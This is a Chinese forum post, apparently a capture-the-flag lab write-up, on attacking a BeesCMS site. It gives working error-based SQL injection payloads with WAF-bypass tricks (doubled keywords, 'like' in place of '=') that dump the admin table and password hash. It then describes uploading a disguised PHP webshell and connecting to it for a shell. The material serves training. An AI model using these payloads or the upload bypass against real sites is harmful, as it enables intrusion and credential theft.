公开课 尤里的复仇Ⅱ sql-注入绕过防护getshell

doomkij   ·   发表于 2021-11-29 15:39:35   ·   CTF&WP专版

尤里的复仇Ⅱ sql-注入绕过防护getshell

Tips:

这天,在朋友的介绍下,他受邀测试了某集团的网站,在签完授权合同后,他平复下激动的心情,找到漏洞所在点,祭出神器,结果……
他发现有拦截,于是开始放下工具,学习如何绕狗……
最终,他成功完成了这次任务

一个基础的绕过,感受下绕过的逻辑

信息搜集

访问网站,查询网站指纹beescms,网上搜漏洞,找到sql注入存在的后台

绕过防护报错注入

用户名等于1’,提示数据库报错,存在注入点。

祭出burpsuite进行报错注入

根据回显很清楚的判断出存在敏感信息过滤,双写入绕过

暴库

1' or updatexml(1,concat(0x7e,(sselectelect database()),0x7e),1)#


bees

暴表

这里把where给过滤了,绕过wh+where+ere

等于号用like代替

1' or updatexml(1,concat(0x7e,(sselectelect group_concat(table_name) fr+from+om information_schema.tables wh+where+ere table_schema like'bees'),0x7e),1)#

‘~bees_admin,bees_admin_group,bee’

暴字段

1' or updatexml(1,concat(0x7e,(sselectelect group_concat(column_name) fr+from+om information_schema.columns wh+where+ere table_name like'bees_admin'),0x7e),1)#

‘~id,admin_name,admin_password,ad’

暴数据

提示只能显示一行的数据,需要加上limit 1 做限制

1' or updatexml(1,concat(0x7e,(sselectelect admin_name fr+from+om bees_admin limit 1),0x7e),1)#
1' or updatexml(1,concat(0x7e,(sselectelect admin_password fr+from+om bees_admin limit 1),0x7e),1)#

账号:admin

密码:21232f297a57a5a743894a0e4a801fc

网上解码的密码为admin

登入后台getshell

发现有文件上传漏洞

上传图片马,修改后缀名为php绕过前端检验

点击上传了的图片解析一句话木马

用菜刀连接拿到shell,然后找到flag

打赏我,让我更有动力~

0 Reply   |  Until 5个月前 | 350 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.